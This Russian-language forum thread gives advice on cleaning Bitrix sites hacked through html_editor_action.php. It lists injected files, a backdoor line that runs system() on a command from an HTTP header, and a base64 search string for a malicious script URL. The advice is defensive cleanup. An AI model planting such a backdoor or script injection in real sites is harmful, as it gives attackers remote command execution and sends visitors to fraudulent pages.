Евгений Донич, а у пользователя стояли последние обновления движка?
вроде уязвимость в html_editor_action.php уже давно прикрыли
вроде уязвимость в html_editor_action.php уже давно прикрыли
09.01.2023 14:12:43
Евгений Донич, а у пользователя стояли последние обновления движка?
вроде уязвимость в html_editor_action.php уже давно прикрыли |
|
|
09.01.2023 13:51:08
почему Вы так решили? на сколько я понимаю там несколько другой механизм задействован - т.е. /upload/tmp/ это не = директория хранения временных файлов |
|||
|
29.11.2022 15:50:37
судя по информации в статьях из предыдущего поста - с большой долей вероятности вас взломали через уязвимость html_editor_action.php - все симптомы взлом "на лицо" на сайте, где в данный момент занимаюсь этой проблемой обнаружил тоже самое "снос" данной папки Вам вообще ничего не даст - это следы взлома, нужно защищать html_editor_action.php либо обновляться |
|||
|
29.11.2022 14:17:13
поиском поищите, либо методом исключения ... уже встроенную рабочую иньекцию думаю найти то можно вообще вот хорошая статья на эту тему (но это от будущих заражений, то что уже заражено нужно самому вычистить). Пишут, что зараза редиректит на фейковый сайт озона - а это попахивает "жареным" т.е. посетители запросто могут там что то приобрести ... Если коротенько * чистим /bitrix/js/main/core/core.js (в конце - строчка начинается с s=document.createElement(script) ) * чистим /bitrix/modules/main/include/prolog.php (в конце - строчка подключения jqueryui.js) * убиваем /bitrix/components/bitrix/main.file.input/main.php (я так понимаю скрипт управления - чтоб проще заливать было что захочешь) * чистим /bitrix/modules/fileman/classes/general/html_editor.php (вырезаем 2 строчки - бэкдор на выполнение system()) "spell_word" => $_SERVER['HTTP_S'] == "bermuda" ? die(system($_SERVER['HTTP_P'])) : "", И if(substr($_POST['bxu_info']['CID'], 0, 7 ) === "default") die(); Внимание! - искать не полностью по вхождению т.к. у меня вместо bermuda было speaker А в следующей статье - как залатать дыры, чтобы такое больше не появлялось, правда боюсь с такой реализацией могут быть проблемы с встроенным html редактором - поэтому думаю правильнее просто обновить Битрикс до актуальной версии.
|
|||||
|
15.11.2022 15:28:02
Дак это ж всё - сразу "Привет" Скрипт будет выполняться от рута, со всеми вытекающими ... |
|||
|
15.11.2022 04:11:41
Зачем кому-то это делать? |
|||
|
11.11.2022 03:38:42
Алексей Чебанов, Вас оскорбляли?
Так и не понял, чем решение для vps будет отличаться от решения для шаред хостинга |
|
|
10.11.2022 03:54:35
Алексей Чебанов, поясните этот момент
Какие именно виды атак на свежей сборки прошли? Какие дыры Вы залатали? |
|||
|
23.10.2022 18:19:14
он точно вирусный? не похоже по коду - выглядит как штатный |
|||
|
20.10.2022 15:43:48
Да, гит отличное решение. Но обычно как раз битриксовый движек исключают из гита, но в данном случае наверное лучше весь сайт (кроме upload и кеша) туда бахнуть. В принципе можно в исключения всякую статику добавить типа картинок и архивов. |
|||
|
17.10.2022 09:13:59
ну дак по консоли и раскручивай - бери самые первые ошибки и смотри
у меня тоже там много записей было, но первая именно на core.js - поправил только там и везде заработало поищи по вхождению aHR0cHM6Ly9zdG9yZWpzY2RuLnB3L2pxdWVyeXVpLmpz и storejscdn может тот же файл, только в другом месте иньекция |
|
|
17.10.2022 06:43:58
тут не понял ... где и что я должен видеть у меня был такой код и админка поднялась у Вас видимо иначе, но судя по скриншоту консоль лога проблема именно в core.js скиньте ссылку на него - гляну |
|||
|
17.10.2022 05:50:33
в файле /bitrix/modules/main/prolog.php
убираем последнюю строчку - инъекция js файла
в файле /bitrix/js/main/core/core.js в самом конце ещё одна иньекция
подключается тот же файл после правки первого поднимается сайт после правки второго админка |
|||||
|
31.08.2022 14:12:10
коли это не ваше - выкидывайте смело |
|||
|